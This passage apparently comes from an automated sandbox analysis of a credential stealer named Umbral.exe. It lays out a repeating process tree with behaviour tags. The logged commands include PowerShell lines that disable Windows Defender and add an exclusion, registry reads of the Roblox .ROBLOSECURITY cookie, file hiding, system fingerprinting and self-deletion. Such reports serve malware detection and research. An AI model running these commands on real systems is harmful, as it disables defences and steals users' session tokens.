        36⤵
        
        PID:4572
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:1948
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:2104
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:2624
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3184
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:2372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:1416
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        36⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:396
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:3108
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        34⤵
        
        PID:4856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        34⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        33⤵
        Executes dropped EXE
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        33⤵
        Executes dropped EXE
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        32⤵
        Executes dropped EXE
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Executes dropped EXE
        
        PID:4028
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        31⤵
        Executes dropped EXE
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        31⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:4288
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        32⤵
        Views/modifies file attributes
        
        PID:3108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:3544
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:4892
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:2244
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:4852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:3936
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:5092
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        32⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2316
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        30⤵
        Executes dropped EXE
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        30⤵
        Executes dropped EXE
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        29⤵
        Executes dropped EXE
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        29⤵
        Executes dropped EXE
        
        PID:3936
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        28⤵
        Executes dropped EXE
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Executes dropped EXE
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        27⤵
        Executes dropped EXE
        
        PID:2028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        27⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:5020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:4476
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        28⤵
        Views/modifies file attributes
        
        PID:4576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        28⤵
        
        PID:3976
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:4236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        28⤵
        
        PID:4592
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        28⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        28⤵
        
        PID:3284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4336
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        28⤵
        Detects videocard installed
        
        PID:3600
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        28⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:740
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3300
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        26⤵
        Executes dropped EXE
        
        PID:1564
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        26⤵
        Executes dropped EXE
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        25⤵
        Executes dropped EXE
        
        PID:2164
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        Executes dropped EXE
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        24⤵
        Executes dropped EXE
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Executes dropped EXE
        
        PID:2076
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        23⤵
        Executes dropped EXE
        
        PID:5064
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4692
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:3600
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        Views/modifies file attributes
        
        PID:2872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        24⤵
        
        PID:1548
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        24⤵
        
        PID:4328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        24⤵
        
        PID:4608
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        24⤵
        
        PID:4508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4732
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        24⤵
        Detects videocard installed
        
        PID:2876
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1364
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        25⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2468
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        22⤵
        Executes dropped EXE
        
        PID:4476
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Executes dropped EXE
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        21⤵
        Executes dropped EXE
        
        PID:5028
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        20⤵
        Executes dropped EXE
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        19⤵
        Executes dropped EXE
        
        PID:2108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:4332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:240
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Views/modifies file attributes
        
        PID:3980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4280
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        20⤵
        
        PID:2612
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        20⤵
        
        PID:2108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        20⤵
        
        PID:816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        20⤵
        
        PID:204
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4264
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        20⤵
        Detects videocard installed
        
        PID:1140
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:728
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        21⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4732
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        18⤵
        Executes dropped EXE
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:388
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        17⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Executes dropped EXE
        
        PID:3300
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        16⤵
        Executes dropped EXE
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        15⤵
        Executes dropped EXE
        
        PID:2344
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:4704
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        14⤵
        Executes dropped EXE
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4812
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:2984
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Views/modifies file attributes
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:2372
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:904
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4596
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:740
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:224
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1240
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        13⤵
        Executes dropped EXE
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:4304
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        12⤵
        Executes dropped EXE
        
        PID:4460
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        11⤵
        Executes dropped EXE
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Executes dropped EXE
        
        PID:3380
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        10⤵
        Executes dropped EXE
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4796
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:2100
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Views/modifies file attributes
        
        PID:3408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:732
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:4288
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        11⤵
        
        PID:5000
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        11⤵
        
        PID:2192
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        11⤵
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4668
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        12⤵
        
        PID:2788
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        11⤵
        Detects videocard installed
        
        PID:2328
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4372
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        9⤵
        Executes dropped EXE
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:3144
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        8⤵
        Executes dropped EXE
        
        PID:1300
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
